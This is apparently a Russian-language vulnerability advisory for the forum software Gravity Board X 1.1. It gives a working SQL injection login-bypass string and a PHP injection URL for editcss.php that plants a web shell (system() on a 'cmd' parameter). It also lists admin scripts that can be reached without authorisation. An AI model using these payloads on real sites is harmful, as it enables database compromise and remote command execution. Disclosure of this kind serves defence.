Программа: Gravity Board X 1.1
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, выполнить произвольные PHP команды на системе.
1. SQL-инъекция возможна из-за недостаточной проверки входных данных в параметре 'login'. Удаленный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения.
Пример:
login: ' or isnull(1/0) /*
password: whatever
2. Удаленный авторизованный администратор может внедрить произвольный HTML сценарий в шаблон и произвести XSS нападение.
3. Уязвимость существует в сценарии 'editcss.php'. Удаленный пользователь может внедрить в шаблон произвольный PHP сценарий и выполнить его во время загрузки страницы с привилегиями web сервера.
Пример:
http://[target]/[path]/editcss.php?csscontent=</style> <?php%2 0system($HTTP_GET_VARS[cmd]);%20?>
Выполнение команд будет возможно с помощью URL:
http://[target]/[path]/index?cmd=[command]
4. Удаленный пользователь может получить данные роб установочной директории приложения, обратившись непосредственно к следующим сценариям:
http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path] /ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[targ et]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php